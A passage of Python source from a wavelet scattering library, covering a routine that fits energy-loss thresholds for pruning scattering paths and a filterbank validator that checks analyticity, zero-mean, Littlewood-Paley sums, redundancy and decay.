out_type`. By default, the program will restore\n them to original values even upon interruption via `try-finally`.\n\n Parameters\n ----------\n sc : Scattering1D\n Time Scattering instance.\n\n Use to also compute for JTFS, by instantiating with same time scattering\n params (`J`, `Q`, etc). See \"JTFS example\" below.\n\n x_all : tensor / list[tensor] / generator\n List of 1D tensors, 2D tensor shaped `(n_samples, time)`,\n or a generator (see \"Generator example\" below).\n\n For machine learning, this should *not* include samples from the test\n set; that leaks the test set. If one wants to be safe, a slightly\n smaller `e_loss_goal` can be chosen.\n\n e_loss_goal : float[>0, <1]\n Energy loss goal; this shall not be exceeded by `sc` over `x_all`.\n\n outs_dir : str / None\n Path to pre-computed full transform's outputs.\n See \"Performance tip\" below.\n\n verbose : bool (default True)\n Whether to print progress reports.\n\n Returns\n -------\n e_th_optimal_est : float\n Optimal `e_th` as passed to `smart_paths()`, as estimated by the\n search procedure.\n\n The output of such `smart_paths()` is already set to `sc.paths_exclude`,\n so this output can be discarded.\n\n Performance tip\n ---------------\n Simply use `outs_dir` as below; only a single pass over the dataset will take\n place. Requires `out_type='array'`.\n\n ::\n wavespin.toolkit._compute_e_fulls(sc, x_all, outs_dir)\n fit_smart_paths(..., outs_dir=outs_dir)\n\n JTFS example\n ------------\n ::\n jtfs = TimeFrequencyScattering1D(2048)\n sc = Scattering1D(**{k: getattr(jtfs, k) for k in\n ('shape', 'J', 'Q', 'T', 'max_pad_factor')})\n fit_smart_paths(sc, x_all)\n\n Generator example\n -----------------\n Must supply `__getitem__` and `__len__` methods.\n Below loads numpy arrays from a directory.\n\n ::\n class MyGen():\n def __init__(self, directory):\n from pathlib import Path\n self.paths = [p for p in Path(directory).iterdir()\n if p.suffix == '.npy']\n\n def __getitem__(self, idx):\n if idx >= len(self): # needed if method doesn't throw IndexError\n raise IndexError # so here not needed per `paths[idx]`\n return np.load(self.paths[idx])\n\n def __len__(self):\n return len(self.paths)\n\n x_all = MyGen(r\"C:/Desktop/my_data//\")\n\n JTFS vs Scattering1D\n --------------------\n Scattering1D enjoys the property, `e_loss(e_th1) >= e_loss(e_th2)`, for all\n `e_th1 >= e_th2` and `x`. This means we can find the right `e_th` for a\n given `e_loss` from a single pass over the dataset:\n\n 1. Start with high `e_th`.\n 2. If new `x` violates `e_loss`, lower `e_th`. This `e_th` is guaranteed\n to not violate `e_loss` for any preceding `x` due to said property:\n the energy loss for those `x` can only go *lower* from lowering `e_th`.\n 3. Repeat for all `x`. The final `e_th` is the optimal `e_th`, within\n the search increment (currently `e_th *= .99`).\n\n JTFS doesn't enjoy this property. Changing the number of first-order rows\n for any given `n2` has non-linear interactions with second-order coefficients\n - namely, it changes the length of convolution and potentially padding, so\n *fewer* `n1`'s may *increase* joint coefficients' energies. This is probable\n with `pad_mode_fr='zero'`, but not with `'conj-reflect-zero'`, as latter\n strives for energy conservation.\n\n Arguably, it's better to use Scattering1D to compute for JTFS. Ideally, JTFS\n second-order energy equals Scattering1D second-order energy, hence we can\n use one to get the other - but ideal doesn't work per above, and the\n differences are sometimes meaningful. I we decide they aren't meaningful,\n then Scattering1D provides true energy loss measures.\n\n Why isn't JTFS directly supported?\n ----------------------------------\n Implementation and testing complexity too great given its benefits.\n Also quite slow.\n\n Originally this method supported all but one thing JTFS needed: it required\n completely re-instantiating JTFS with its original configurations each time\n `paths_exclude` was updated, so one would have to pass in the configs or\n they'd need to be fetched automatically. This isn't that hard but it is quite\n slow and with everything else requires a fair bit of testing code.\n \"\"\"\n # wrap in `try-finally` to restore changed parameters\n pe = sc.paths_exclude.copy()\n ot = sc.out_type\n try:\n sc.out_type = 'array'\n out = _fit_smart_paths(sc, x_all, e_loss_goal, outs_dir, verbose)\n finally:\n sc.out_type = ot\n sc.paths_exclude.update(pe)\n return out\n\n\ndef _fit_smart_paths(sc, x_all, e_loss_goal, outs_dir, verbose):\n # handle args ############################################################\n # sanity checks\n if hasattr(x_all, 'ndim'):\n assert x_all.ndim == 2, x_all.shape\n elif isinstance(x_all, list):\n assert all(x.ndim == 1 for x in x_all)\n assert 0 < e_loss_goal < 1, e_loss_goal\n\n # prepare to loop ########################################################\n # first collect full transform's energies\n if outs_dir is not None:\n e_fulls = np.load(os.path.join(outs_dir, 'e_fulls.npy'))\n if verbose:\n print(\"Using pre-computed `e_fulls`...\")\n else:\n e_fulls = _compute_e_fulls(sc, x_all, verbose=verbose)\n\n # initialize paths_exclude to a high since we'll only be lowering it\n e_th_pseudo_max = .5\n e_th_init = e_th_pseudo_max\n sc.paths_exclude = smart_paths_exclude(sc.psi1_f, sc.psi2_f,\n e_th_direct=e_th_init)\n\n # main loop ##############################################################\n e_th_optimal_est = _compute_e_losses(\n sc, x_all, e_fulls, e_th_init, e_loss_goal, e_th_pseudo_max, outs_dir,\n verbose)\n return e_th_optimal_est\n\n\ndef _compute_e_losses(sc, x_all, e_fulls, e_th_init, e_loss_goal=-1,\n e_th_pseudo_max=.5, outs_dir=None, verbose=1):\n # maybe print status\n if verbose:\n print(\"Optimizing energy threshold for e_loss_goal=%.3g...\" % e_loss_goal)\n\n # derived params\n ckw = dict(psi1_f=sc.psi1_f, psi2_f=sc.psi2_f)\n if outs_dir is not None:\n outs_dir = os.path.abspath(outs_dir) # for debug\n # get full meta then restore paths\n sp, sc.paths_exclude = sc.paths_exclude, {}\n ns_full = sc.meta()['n']\n sc.paths_exclude = sp\n\n # reusable\n def compute_e_loss(idx, e_th_current, x=None, update_paths=False):\n if update_paths:\n sp = smart_paths_exclude(**ckw, e_th_direct=e_th_current)\n sc.paths_exclude = sp\n\n # either get `x` and scatter, or load precomputed output and trim it\n if outs_dir is not None:\n out = np.load(os.path.join(outs_dir, f'{idx}.npy'))\n if out.ndim == 2:\n out = out[None] # add batch dim if absent\n out = out.transpose(1, 0, 2) # prep for iterating coefficients\n\n out_sp = []\n for row, n in zip(out, ns_full):\n if tuple(n) not in sc.paths_exclude['n2, n1']:\n out_sp.append(row)\n out_sp = np.array(out_sp).transpose(1, 0, 2)\n\n # assert expected shapes, as we reasonably can\n A = len(out) - out_sp.shape[1]\n B = len(sc.paths_exclude['n2, n1'])\n assert A == B, (A, B, out.shape, out_sp.shape)\n else:\n if x is None:\n x = x_all[idx]\n x = x[None] if x.ndim == 1 else x # add batch dim if absent\n out_sp = sc(x)\n\n # compute energy and corresponding loss\n e_sp = samples_energy(out_sp)\n e_loss = 1 - npy(e_sp) / e_fulls[idx]\n\n return e_loss, x\n\n # track thresholds and obtained losses\n e_th_current = e_th_init\n e_ths_all = [e_th_current]\n # loop params\n ranger = _get_ranger(verbose)\n\n e_losses = []\n\n # pass loop ##########################################################\n # Scattering1D: `e_th_current` is only lowered inside this loop, and upon\n # lowering, the value is checked to not violate `e_loss_goal`, so whatever\n # its final loop value is, it's guaranteed to not violate `e_loss_goal`.\n for i in ranger(len(x_all)):\n e_loss, x = compute_e_loss(i, e_th_current)\n\n # if loss exceeds goal, lower e_th_current\n if any(el > e_loss_goal for el in e_loss):\n # check that it doesn't violate `e_loss_goal`, and if it does,\n # adjust lightly until it no longer does so\n eloss, _ = compute_e_loss(i, e_th_current, x, update_paths=True)\n while any(el > e_loss_goal for el in eloss):\n e_th_current *= .99\n eloss, _ = compute_e_loss(i, e_th_current, x,\n update_paths=True)\n # track\n e_ths_all.append(e_th_current)\n\n e_losses.append(e_loss)\n e_th_loop_out = e_th_current\n\n # finalize ###############################################################\n e_th_optimal_est = e_th_loop_out\n sc.paths_exclude = smart_paths_exclude(**ckw, e_th_direct=e_th_optimal_est)\n return e_th_optimal_est\n\n\ndef _compute_e_fulls(sc, x_all, outs_dir=None, verbose=1):\n if outs_dir is not None:\n outs_dir = os.path.abspath(outs_dir)\n if verbose:\n if outs_dir is None:\n print(\"Gathering full transform's energies...\")\n else:\n print(\"Gathering full transform's energies, and saving in\\n\"\n + outs_dir)\n ranger = _get_ranger(verbose)\n\n e_fulls = []\n sp, sc.paths_exclude = sc.paths_exclude, {}\n for idx in ranger(len(x_all)):\n x = x_all[idx]\n x = x[None] if x.ndim == 1 else x\n out = sc(x)\n e_out = samples_energy(out)\n e_fulls.append(e_out)\n if outs_dir is not None:\n np.save(os.path.join(outs_dir, f'{idx}.npy'), npy(out))\n sc.paths_exclude = sp\n\n if verbose:\n print(\"... done\\n\")\n\n e_fulls = npy(e_fulls)\n if e_fulls.ndim == 1:\n e_fulls = e_fulls[:, None]\n if outs_dir is not None:\n np.save(os.path.join(outs_dir, 'e_fulls.npy'), e_fulls)\n return e_fulls\n\n\ndef samples_energy(x):\n \"\"\"(batch_size, *spatial) -> (batch_size,)\"\"\"\n return energy(x, axis=tuple(range(1, x.ndim)))\n\n#### Validating 1D filterbank ################################################\ndef validate_filterbank_tm(sc=None, psi1_f=None, psi2_f=None, phi_f=None,\n criterion_amplitude=1e-3, verbose=True):\n \"\"\"Runs `validate_filterbank()` on temporal filters; supports `Scattering1D`\n and `TimeFrequencyScattering1D`.\n\n Parameters\n ----------\n sc : `Scattering1D` / `TimeFrequencyScattering1D` / None\n If None, then `psi1_f_fr_up`, `psi1_f_fr_dn`, and `phi_f_fr` must\n be not None.\n\n psi1_f : list[tensor] / None\n First-order bandpasses in frequency domain.\n Overridden if `sc` is not None.\n\n psi2_f : list[tensor] / None\n Second-order bandpasses in frequency domain.\n Overridden if `sc` is not None.\n\n phi_f : tensor / None\n Lowpass filter in frequency domain.\n Overridden if `sc` is not None.\n\n criterion_amplitude : float\n Used for various thresholding in `validate_filterbank()`.\n\n verbose : bool (default True)\n Whether to print the report.\n\n Returns\n -------\n data1, data2 : dict, dict\n Returns from `validate_filterbank()` for `psi1_f` and `psi2_f`.\n \"\"\"\n if sc is None: # no-cov\n assert not any(arg is None for arg in (psi1_f, psi2_f, phi_f))\n else:\n psi1_f, psi2_f, phi_f = [getattr(sc, k) for k in\n ('psi1_f', 'psi2_f', 'phi_f')]\n psi1_f, psi2_f = [[p[0] for p in ps] for ps in (psi1_f, psi2_f)]\n phi_f = phi_f[0][0] if isinstance(phi_f[0], list) else phi_f[0]\n\n if verbose: # no-cov\n print(\"\\n// FIRST-ORDER\")\n data1 = validate_filterbank(psi1_f, phi_f, criterion_amplitude,\n verbose=verbose,\n for_real_inputs=True, unimodal=True)\n if verbose: # no-cov\n print(\"\\n\\n// SECOND-ORDER\")\n data2 = validate_filterbank(psi2_f, phi_f, criterion_amplitude,\n verbose=verbose,\n for_real_inputs=True, unimodal=True)\n return data1, data2\n\n\ndef validate_filterbank_fr(sc=None, psi1_f_fr_up=None, psi1_f_fr_dn=None,\n phi_f_fr=None, psi_id=0, criterion_amplitude=1e-3,\n verbose=True):\n \"\"\"Runs `validate_filterbank()` on frequential filters of JTFS.\n\n Parameters\n ----------\n sc : `TimeFrequencyScattering1D` / None\n JTFS instance. If None, then `psi1_f_fr_up`, `psi1_f_fr_dn`, and\n `phi_f_fr` must be not None.\n\n psi1_f_fr_up : list[tensor] / None\n Spin up bandpasses in frequency domain.\n Overridden if `sc` is not None.\n\n psi1_f_fr_dn : list[tensor] / None\n Spin down bandpasses in frequency domain.\n Overridden if `sc` is not None.\n\n phi_f_fr : tensor / None\n Lowpass filter in frequency domain.\n Overridden if `sc` is not None.\n\n psi_id : int\n See `psi_id` in `filter_bank_jtfs.psi_fr_factory`.\n\n criterion_amplitude : float\n Used for various thresholding in `validate_filterbank()`.\n\n verbose : bool (default True)\n Whether to print the report.\n\n Returns\n -------\n data_up, data_dn : dict, dict\n Returns from `validate_filterbank()` for `psi1_f_fr_up` and\n `psi1_f_fr_dn`.\n \"\"\"\n if sc is None: # no-cov\n assert not any(arg is None for arg in\n (psi1_f_fr_up, psi1_f_fr_dn, phi_f_fr))\n else:\n psi1_f_fr_up, psi1_f_fr_dn, phi_f_fr = [\n getattr(sc, k) for k in\n ('psi1_f_fr_up', 'psi1_f_fr_dn', 'phi_f_fr')]\n\n psi1_f_fr_up, psi1_f_fr_dn = psi1_f_fr_up[psi_id], psi1_f_fr_dn[psi_id]\n phi_f_fr = phi_f_fr[0][0][0]\n\n if verbose: # no-cov\n print(\"\\n// SPIN UP\")\n data_up = validate_filterbank(psi1_f_fr_up, phi_f_fr, criterion_amplitude,\n verbose=verbose,\n for_real_inputs=False, unimodal=True)\n if verbose: # no-cov\n print(\"\\n\\n// SPIN DOWN\")\n data_dn = validate_filterbank(psi1_f_fr_dn, phi_f_fr, criterion_amplitude,\n verbose=verbose,\n for_real_inputs=False, unimodal=True)\n return data_up, data_dn\n\n\ndef validate_filterbank(psi_fs, phi_f=None, criterion_amplitude=1e-3,\n for_real_inputs=True, unimodal=True, is_time_domain=False,\n verbose=True):\n \"\"\"Checks whether the wavelet filterbank is well-behaved against several\n criterion:\n\n 1. Analyticity:\n\n - A: Whether analytic *and* anti-analytic filters are present\n (input should contain only one)\n - B: Extent of (anti-)analyticity - whether there's components\n on other side of Nyquist\n - C: Whether the Nyquist bin is halved\n\n 2. Aliasing:\n\n - A. Whether peaks are sorted (left to right or right to left).\n If not, it's possible aliasing (or sloppy user input).\n - B. Whether peaks are distributed exponentially or linearly.\n If neither, it's possible aliasing. (Detection isn't foulproof.)\n\n 3. Zero-mean: whether filters are zero-mean (in time domain)\n\n 4. Zero-phase: whether filters are zero-phase\n\n 5. Frequency coverage: whether filters capture every frequency,\n and whether they do so excessively or insufficiently.\n\n - Measured with Littlewood-Paley sum (sum of energies),\n the \"energy transfer function\".\n - Also measured with sum of LP sum, in case of imperfect\n analyticity not being accounted for (must fold leaked frequencies,\n see `help(toolkit.compute_lp_sum)`, `fold_antianalytic`).\n\n 6. Frequency-bandwidth tiling: whether upper quarters of frequencies\n follow CQT (fixed `xi/sigma = (center freq) / bandwidth`), and\n whether all wavelet peak frequencies are distributed either\n exponentially or linearly.\n\n Only upper quarters (i.e. not `0 to N//4`) is checked for CQT because\n the non-CQT portion could be in the majority, but unlikely for it to\n ever span the upper half.\n\n 7. Redundancy: whether filters overlap excessively (this isn't\n necessarily bad).\n\n - Measured as ratio of product of energies to sum of energies\n of adjacent filters\n - Also measured as peak duplication in frequency domain. Note,\n it's possible to exceed redundancy thershold without duplicating\n peaks, and vice versa (but latter is more difficult).\n\n 8. Decay:\n\n - A: Whether any filter is a pure sine (occurs if we try to sample\n a wavelet at too low of a center frequency)\n - B: Whether filters decay sufficiently in time domain to avoid\n boundary effects\n - C: Whether filters decay sufficiently in frequency domain\n (bandwidth isn't the entire signal), and whether they decay\n permanently (don't rise again after decaying)\n\n B may fail for same reason as 8A & 8B (see these).\n\n 9. Temporal peaks:\n\n - A: Whether peak is at t==0\n - B: Whether there is only one peak\n - C: Whether decay is smooth (else will incur inflection points)\n\n A and B may fail to hold for lowest xi due to Morlet's corrective\n term; this is proper behavior.\n See https://www.desmos.com/calculator/ivd7t3mjn8\n\n Parameters\n ----------\n psi_fs : list[tensor]\n Wavelet filterbank, by default in frequency domain (if in time domain,\n set `in_time_domain=True`.\n Analytic or pseudo-analytic, or anti- of either; does not support\n real-valued wavelets (in time domain).\n\n If `psi_fs` aren't all same length, will pad in time domain and\n center about `n=0` (DFT-symmetrically), with original length's center\n placed at index 0.\n\n Note, if `psi_fs` are provided in time domain or aren't all same length,\n they're padded such that FFT convolution matches\n `np.convolve(, mode='full')`. If wavelets are properly centered for FFT\n convolution - that is, either at `n=0` or within `ifftshift` or `n=0`,\n then for even lengths, `np.convolve` *will not* produce correct\n results - which is what happens with `scipy.cwt`.\n\n phi_f : tensor\n Lowpass filter in frequency domain, of same length as `psi_fs`.\n\n criterion_amplitude : float\n Used for various thresholding.\n\n for_real_inputs : bool (default True)\n Whether the filterbank is intended for real-only inputs.\n E.g. `False` for spinned bandpasses in JTFS.\n\n unimodal : bool (default True)\n Whether the wavelets have a single peak in frequency domain.\n If `False`, some checks are omitted, and others might be inaccurate.\n Always `True` for Morlet wavelets.\n\n in_time_domain : bool (default False)\n Whether `psi_fs` are in time domain. See notes in `psi_fs`.\n\n verbose : bool (default True)\n Whether to print the report.\n\n Returns\n -------\n data : dict\n Aggregated testing info, along with the report. For keys, see\n `print(list(data))`. Note, for entries that describe individual filters,\n the indexing corresponds to `psi_fs` sorted in order of decreasing\n peak frequency.\n \"\"\"\n def pop_if_no_header(report, did_atleast_one_header):\n \"\"\"`did_atleast_one_header` sets to `False` after every `title()` call,\n whereas `did_header` before every subsection, i.e. a possible\n `if not did_header: report += []`. Former is to pop titles, latter\n is to avoid repeatedly appending subsection text.\n \"\"\"\n if not did_atleast_one_header:\n report.pop(-1)\n\n # handle `psi_fs` domain and length ######################################\n # squeeze all for convenience\n psi_fs = [p.squeeze() for p in psi_fs]\n # fetch max length\n max_len = max(len(p) for p in psi_fs)\n\n # take to freq or pad to max length\n _psi_fs = [] # store processed filters\n # also handle lowpass\n if phi_f is not None:\n psi_fs.append(phi_f)\n\n for p in psi_fs:\n if len(p) != max_len:\n if not is_time_domain:\n p = ifft(p)\n # right-pad\n orig_len = len(p)\n p = np.pad(p, [0, max_len - orig_len])\n # odd case: circularly-center about n=0; equivalent to `ifftshift`\n # even case: center such that first output index of FFT convolution\n # corresponds to `sum(x, p[::-1][-len(p)//2:])`, where `p` is in\n # time domain. This is what `np.convolve` does, and it's *not*\n # equivalent to FFT convolution after `ifftshift`\n center_idx = orig_len // 2\n p = np.roll(p, -(center_idx - 1))\n # take to freq-domain\n p = fft(p)\n elif is_time_domain:\n center_idx = len(p) // 2\n p = np.roll(p, -(center_idx - 1))\n p = fft(p)\n _psi_fs.append(p)\n psi_fs = _psi_fs\n # recover & detach phi_f\n if phi_f is not None:\n phi_f = psi_fs.pop(-1)\n\n ##########################################################################\n\n # set reference filter\n psi_f_0 = psi_fs[0]\n # fetch basic metadata\n N = len(psi_f_0)\n\n # assert all inputs are same length\n # note, above already guarantees this, but we keep the code logic in case\n # something changes in the future\n for n, p in enumerate(psi_fs):\n assert len(p) == N, (len(p), N)\n if phi_f is not None:\n assert len(phi_f) == N, (len(phi_f), N)\n\n # initialize report\n report = []\n data = {k: {} for k in ('analytic_a_ratio', 'nonzero_mean', 'sine', 'decay',\n 'imag_mean', 'time_peak_idx', 'n_inflections',\n 'redundancy', 'peak_duplicates')}\n data['opposite_analytic'] = []\n\n def title(txt):\n return (\"\\n== {} \" + \"=\" * (80 - len(txt)) + \"\\n\").format(txt)\n # for later\n w_pos = np.linspace(0, N//2, N//2 + 1, endpoint=True).astype(int)\n w_neg = - w_pos[1:-1][::-1]\n w = np.hstack([w_pos, w_neg])\n eps = np.finfo(psi_f_0.dtype).eps\n\n peak_idxs = np.array([np.argmax(np.abs(p)) for p in psi_fs])\n peak_idxs_sorted = np.sort(peak_idxs)\n if unimodal and not (np.all(peak_idxs == peak_idxs_sorted) or\n np.all(peak_idxs == peak_idxs_sorted[::-1])):\n warnings.warn(\"`psi_fs` peak locations are not sorted; a possible reason \"\n \"is aliasing. Will sort, breaking mapping with input's.\")\n data['not_sorted'] = True\n peak_idxs = peak_idxs_sorted\n\n # Analyticity ############################################################\n # check if there are both analytic and anti-analytic bandpasses ##########\n report += [title(\"ANALYTICITY\")]\n did_header = did_atleast_one_header = False\n\n peak_idx_0 = np.argmax(psi_f_0)\n if peak_idx_0 == N // 2: # ambiguous case; check next filter\n peak_idx_0 = np.argmax(psi_fs[1])\n analytic_0 = bool(peak_idx_0 < N//2)\n # assume entire filterbank is per psi_0\n analyticity = \"analytic\" if analytic_0 else \"anti-analytic\"\n\n # check whether all is analytic or anti-analytic\n found_counteranalytic = False\n for n, p in enumerate(psi_fs[1:]):\n peak_idx_n = np.argmax(np.abs(p))\n analytic_n = bool(peak_idx_n < N//2)\n if not (analytic_0 is analytic_n):\n if not did_header:\n report += [(\"Found analytic AND anti-analytic filters in same \"\n \"filterbank! psi_fs[0] is {}, but the following \"\n \"aren't:\\n\").format(analyticity)]\n did_header = did_atleast_one_header = True\n report += [f\"psi_fs[{n}]\\n\"]\n data['opposite_analytic'].append(n)\n found_counteranalytic = True\n\n # set `is_analytic` based on which there are more of\n if not found_counteranalytic:\n is_analytic = analytic_0\n else:\n n_analytic = sum(np.argmax(np.abs(p)) <= N//2 for p in psi_fs)\n n_antianalytic = sum(np.argmax(np.abs(p)) >= N//2 for p in psi_fs)\n if n_analytic > n_antianalytic or n_analytic == n_antianalytic:\n is_analytic = True\n else:\n is_analytic = False\n report += [(\"\\nIn total, there are {} analytic and {} anti-analytic \"\n \"filters\\n\").format(n_analytic, n_antianalytic)]\n\n # determine whether the filterbank is strictly analytic/anti-analytic\n if is_analytic:\n negatives_all_zero = False\n for p in psi_fs:\n # exclude Nyquist as it's both in analytic and anti-analytic\n if not np.allclose(p[len(p)//2 + 1:], 0.):\n break\n else:\n negatives_all_zero = True\n strict_analyticity = negatives_all_zero\n else:\n positives_all_zero = False\n for p in psi_fs:\n # exclude DC, one problem at a time; exclude Nyquist\n if not np.allclose(p[1:len(p)//2], 0.):\n break\n else:\n positives_all_zero = True\n strict_analyticity = positives_all_zero\n\n # determine whether the Nyquist bin is halved\n if strict_analyticity:\n did_header = False\n pf = psi_fs[0]\n if is_analytic:\n nyquist_halved = bool(pf[N//2 - 1] / pf[N//2] > 2)\n else:\n nyquist_halved = bool(pf[N//2 + 1] / pf[N//2] > 2)\n if not nyquist_halved:\n report += [(\"Nyquist bin isn't halved for strictly analytic wavelet; \"\n \"yields improper analyticity with bad time decay.\\n\")]\n did_header = did_atleast_one_header = True\n\n # check if any bandpass isn't strictly analytic/anti- ####################\n did_header = False\n th_ratio = (1 / criterion_amplitude)\n for n, p in enumerate(psi_fs):\n ap = np.abs(p)\n # assume entire filterbank is per psi_0\n if is_analytic:\n # Nyquist is *at* N//2, so to include in sum, index up to N//2 + 1\n a_ratio = (ap[:N//2 + 1].sum() / (ap[N//2 + 1:].sum() + eps))\n else:\n a_ratio = (ap[N//2:].sum() / (ap[:N//2].sum() + eps))\n if a_ratio < th_ratio:\n if not did_header:\n report += [(\"\\nFound not strictly {} filter(s); threshold for \"\n \"ratio of `spectral sum` to `spectral sum past \"\n \"Nyquist` is {} - got (less is worse):\\n\"\n ).format(analyticity, th_ratio)]\n did_header = did_atleast_one_header = True\n report += [\"psi_fs[{}]: {:.1f}\\n\".format(n, a_ratio)]\n data['analytic_a_ratio'][n] = a_ratio\n\n # check if any bandpass isn't zero-mean ##################################\n pop_if_no_header(report, did_atleast_one_header)\n report += [title(\"ZERO-MEAN\")]\n did_header = did_atleast_one_header = False\n\n for n, p in enumerate(psi_fs):\n if p[0] != 0:\n if not did_header:\n report += [\"Found non-zero mean filter(s)!:\\n\"]\n did_header = did_atleast_one_header = True\n report += [\"psi_fs[{}][0] == {:.2e}\\n\".format(n, p[0])]\n data['nonzero_mean'][n] = p[0]\n\n # Littlewood-Paley sum ###################################################\n def report_lp_sum(report, phi):\n with_phi = not isinstance(phi, int)\n s = \"with\" if with_phi else \"without\"\n report += [title(\"LP-SUM (%s phi)\" % s)]\n did_header = did_atleast_one_header = False\n\n # compute parameters #################################################\n # finish computing lp sum\n lp_sum = lp_sum_psi + np.abs(phi)**2\n lp_sum = (lp_sum[:N//2 + 1] if is_analytic else\n lp_sum[N//2:])\n if with_phi:\n data['lp'] = lp_sum\n else:\n data['lp_no_phi'] = lp_sum\n if not with_phi and is_analytic:\n lp_sum = lp_sum[1:] # exclude dc\n\n # excess / underflow\n diff_over = lp_sum - th_lp_sum_over\n diff_under = th_lp_sum_under - lp_sum\n diff_over_max, diff_under_max = diff_over.max(), diff_under.max()\n excess_over = np.where(diff_over > th_sum_excess)[0]\n excess_under = np.where(diff_under > th_sum_excess)[0]\n if not is_analytic:\n excess_over += N//2\n excess_under += N//2\n elif is_analytic and not with_phi:\n excess_over += 1\n excess_under += 1 # dc\n\n # lp sum sum\n lp_sum_sum = lp_sum.sum()\n # `1` per bin, minus\n # - DC bin, since no phi\n # - half of Nyquist bin, since `analytic=True` cannot ever get a full\n # Nyquist (Nyquist bin is halved, so even in best case of the peak\n # placed at Nyquist, we get 0.5). Unclear if any correction is due\n # on this.\n # negligible adjustments if `N` is large (JTFS N_frs can be small enough)\n expected_sum = N\n if not with_phi:\n expected_sum -= 1\n if strict_analyticity:\n expected_sum -= .5\n\n # scale according to tolerance.\n # tolerances determined empirically from the most conservative case;\n # see `tests.test_jtfs.test_lp_sum`\n th_sum_above = .01\n th_sum_below = .15\n expected_above = expected_sum * (1 + th_sum_above)\n expected_below = expected_sum * (1 - th_sum_below)\n\n # append report entries ##############################################\n input_kind = \"real\" if for_real_inputs else \"complex\"\n if len(excess_over) > 0:\n # show at most 30 values\n stride = max(int(round(len(excess_over) / 30)), 1)\n s = f\", shown skipping every {stride-1} values\" if stride != 1 else \"\"\n report += [(\"LP sum exceeds threshold of {} (for {} inputs) by \"\n \"at most {:.3f} (more is worse) at following frequency \"\n \"bin indices (0 to {}{}):\\n\"\n ).format(th_lp_sum_over, input_kind, diff_over_max,\n N//2, s)]\n report += [\"{}\\n\\n\".format(w[excess_over][::stride])]\n did_header = did_atleast_one_header = True\n if with_phi:\n data['lp_excess_over'] = excess_over\n data['lp_excess_over_max'] = diff_over_max\n else:\n data['lp_no_phi_excess_over'] = excess_over\n data['lp_no_phi_excess_over_max'] = diff_over_max\n\n if len(excess_under) > 0:\n # show at most 30 values\n stride = max(int(round(len(excess_under) / 30)), 1)\n s = f\", shown skipping every {stride-1} values\" if stride != 1 else \"\"\n report += [(\"LP sum falls below threshold of {} (for {} inputs) by \"\n \"at most {:.3f} (more is worse; ~{} implies ~zero \"\n \"capturing of the frequency!) at following frequency \"\n \"bin indices (0 to {}{}):\\n\"\n ).format(th_lp_sum_under, input_kind, diff_under_max,\n th_lp_sum_under, N//2, s)]\n # w_show = np.round(w[excess_under][::stride], 3)\n report += [\"{}\\n\\n\".format(w[excess_under][::stride])]\n did_header = did_atleast_one_header = True\n if with_phi:\n data['lp_excess_under'] = excess_under\n data['lp_excess_under_max'] = diff_under_max\n else:\n data['lp_no_phi_excess_under'] = excess_under\n data['lp_no_phi_excess_under_max'] = diff_under_max\n\n if lp_sum_sum > expected_above:\n report += [(\"LP sum sum exceeds expected: {} > {}. If LP sum \"\n \"otherwise has no excess, then there may be leakage due \"\n \"to imperfect analyticity, corrected by folding; see \"\n \"help(toolkit.fold_lp_sum)\\n\").format(lp_sum_sum,\n expected_above)]\n did_header = did_atleast_one_header = True\n diff = lp_sum_sum - expected_above\n if with_phi:\n data['lp_sum_sum_excess_over'] = diff\n else:\n data['lp_sum_sum_no_phi_excess_over'] = diff\n\n if lp_sum_sum < expected_below:\n report += [(\"LP sum sum falls short of expected: {} < {}. If LP sum \"\n \"otherwise doesn't fall short, then there may be leakage \"\n \"due to imperfect analyticity, corrected by folding; see \"\n \"help(toolkit.fold_lp_sum)\\n\").format(lp_sum_sum,\n expected_below)]\n did_header = did_atleast_one_header = True\n diff = expected_below - lp_sum_sum\n if with_phi:\n data['lp_sum_sum_excess_under'] = diff\n else:\n data['lp_sum_sum_no_phi_excess_under'] = diff\n\n if did_header:\n stdev = np.abs(lp_sum[lp_sum >= th_lp_sum_under] -\n th_lp_sum_under).std()\n report += [(\"Mean absolute deviation from tight frame: {:.2f}\\n\"\n \"Standard deviation from tight frame: {:.2f} \"\n \"(excluded LP sum values below {})\\n\").format(\n np.abs(diff_over).mean(), stdev, th_lp_sum_under)]\n\n pop_if_no_header(report, did_atleast_one_header)\n\n pop_if_no_header(report, did_atleast_one_header)\n th_lp_sum_over = 2 if for_real_inputs else 1\n th_lp_sum_under = th_lp_sum_over / 2\n th_sum_excess = (1 + criterion_amplitude)**2 - 1\n lp_sum_psi = np.sum([np.abs(p)**2 for p in psi_fs], axis=0)\n # fold opposite frequencies to ensure leaks are accounted for\n lp_sum_psi = fold_lp_sum(lp_sum_psi, analytic_part=is_analytic)\n\n # do both cases\n if phi_f is not None:\n report_lp_sum(report, phi=phi_f)\n report_lp_sum(report, phi=0)\n\n # Redundancy #############################################################\n report += [title(\"REDUNDANCY\")]\n did_header = did_atleast_one_header = False\n max_to_print = 20\n\n # overlap ####\n th_r = .4 if for_real_inputs else .2\n\n printed = 0\n for n in range(len(psi_fs) - 1):\n r = compute_filter_redundancy(psi_fs[n], psi_fs[n + 1])\n data['redundancy'][(n, n + 1)] = r\n if r > th_r:\n if not did_header:\n report += [(\"Found filters with redundancy exceeding {} (energy \"\n \"overlap relative to sum of individual energies) \"\n \"-- This isn't necessarily bad. Showing up to {} \"\n \"filters:\\n\").format(th_r, max_to_print)]\n did_header = did_atleast_one_header = True\n if printed < max_to_print:\n report += [\"psi_fs[{}] & psi_fs[{}]: {:.3f}\\n\".format(\n n, n + 1, r)]\n printed += 1\n\n # peak duplication ####\n did_header = False\n\n printed = 0\n for n, peak_idx in enumerate(peak_idxs):\n if np.sum(peak_idx == peak_idxs) > 1:\n data['peak_duplicates'][n] = peak_idx\n if not did_header:\n spc = \"\\n\" if did_atleast_one_header else \"\"\n report += [(\"{}Found filters with duplicate peak frequencies! \"\n \"Showing up to {} filters:\\n\").format(spc,\n max_to_print)]\n did_header = did_atleast_one_header = True\n if printed < max_to_print:\n report += [\"psi_fs[{}], peak_idx={}\\n\".format(n, peak_idx)]\n printed += 1\n\n # Decay: check if any bandpass is a pure sine ############################\n pop_if_no_header(report, did_atleast_one_header)\n report += [title(\"DECAY (check for pure sines)\")]\n did_header = did_atleast_one_header = False\n th_ratio_max_to_next_max = (1 / criterion_amplitude)\n\n for n, p in enumerate(psi_fs):\n psort = np.sort(np.abs(p)) # least to greatest\n ratio = psort[-1] / (psort[-2] + eps)\n if ratio > th_ratio_max_to_next_max:\n if not did_header:\n report += [(\"Found filter(s) that are pure sines! Threshold for \"\n \"ratio of Fourier peak to next-highest value is {} \"\n \"- got (more is worse):\\n\"\n 